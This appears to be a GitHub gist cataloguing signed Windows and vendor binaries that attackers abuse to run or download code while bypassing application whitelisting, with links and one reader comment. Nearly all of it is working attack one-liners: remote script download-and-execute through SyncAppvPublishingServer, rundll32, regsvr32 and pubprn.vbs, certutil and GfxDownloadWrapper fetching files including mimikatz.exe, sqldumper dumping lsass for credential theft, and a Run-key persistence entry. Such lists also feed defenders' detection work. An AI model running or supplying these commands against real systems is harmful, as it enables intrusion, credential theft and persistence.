BinariesThatDoesOtherStuff
forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
bash.exe -c calc.exe
scriptrunner.exe -appvscript calc.exe
SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX
hh.exe http://www.google.com or hh.exe c:\
certutil -Class scrobj.dll
certutil -Class http://WScript.Shell
certutil -urlcache -split -f http://example.com/file
certutil.exe -URL will fetch ANY file and download it here: C:\Users\subTee\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
RUNDLL32.EXE scrobj.dll,GenerateTypeLib test.sct http://[URL] - Does not execute; download only
https://twitter.com/subtee/status/777538038897397761
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
msbuild.exe pshell.xml
regsvcs.exe /U regsvcs.dll regsvcs.exe regsvcs.dll
regasm.exe /U regsvcs.dll regasm.exe regsvcs.dll
bginfo.exe bginfo.bgi /popup /nolicprompt
InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
ieexec.exe http://x.x.x.x:8080/bypass.exe
msxsl.exe customers.xml script.xsl
odbcconf.exe /f my.rsp
sqldumper.exe 464 0 0x0110:40 - Dumps lsass to a mimikatz-compatible dump
https://twitter.com/countuponsec/status/910977826853068800
sqldumper.exe 540 0 0x01100
https://twitter.com/countuponsec/status/910969424215232518
pcalua -a c:\datafolder\tester.bat
pcalua.exe -a \\server\payload.dll
pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
https://twitter.com/0rbz_/status/912530504871759872
C:\Program Files\Microsoft Office\root\client\AppVLP.exe calc.exe
C:\Program Files (x86)\Microsoft Office\root\client>appvlp calc.exe
https://twitter.com/0rbz_/status/915330892637331456
runscripthelper.exe
https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc
winword /l dllfile.dll
https://twitter.com/subTee/status/884615369511636992
InfDefaultInstall.exe shady.inf
https://twitter.com/KyleHanslovan/status/911997635455852544
https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
fsi.exe
https://twitter.com/NickTyrer/status/904273264385589248
AppVLP.exe
"C:\Program Files\Microsoft Office\root\client\AppVLP.exe" calc.exe
"C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe" calc.exe
AppVLP.exe \\webdav\calc.bat
SQLPS.exe
Powershell host
https://twitter.com/bryon_/status/975835709587075072
Diskshadow.exe
diskshadow.exe /s c:\test\diskshadow.txt
diskshadow> exec calc.exe
https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
print /D:c:\ads\file.exe \\server.domain.com\tool\file.exe
print /D:c:\ads\CopyOfAutoruns.exe c:\ads\Autoruns.exe
https://www.youtube.com/watch?v=nPBcSP8M7KE
*** Non-MS binaries ***
nvuhda.exe
nvuhda6.exe
nvuhda6.exe System calc.exe
nvuhda6.exe Copy test.txt,test-2.txt
nvuhda6.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe
nvuhda6.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe","","c:\windows\system32"
nvuhda6.exe KillApp calculator.exe
nvuhda6.exe Run foo
http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
symerr.exe ("cclib.dll" in same directory) - https://twitter.com/0rbz_/status/940028712766005248
SynTPEnh.exe /SHELLEXEC somebinary.exe - https://twitter.com/egre55/status/1052907871749459968?s=09
#Intel
GfxDownloadWrapper.exe "http://10.10.10.10/mimikatz.exe" "C:\Temp\harmless.exe" - https://twitter.com/egre55/status/1093821740298448896
#Acer
RunCmd_x64.exe C:\windows\system32\calc.exe
https://bartblaze.blogspot.com/2019/03/run-applications-and-scripts-using.html
#Plex
plexscripthost.exe #Python script engine
https://twitter.com/Oddvarmoe/status/1092230434786869249
fsacer commented Nov 11, 2017

You could add this even though it's a script:
cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:https://gist.githubusercontent.com/enigma0x3/2e4f571fe76715640d0f8126f321ba07/raw/73c962d65059a211b5d7ea212e9a1054d632622b/new.txt"
https://twitter.com/enigma0x3/status/923311244358094848
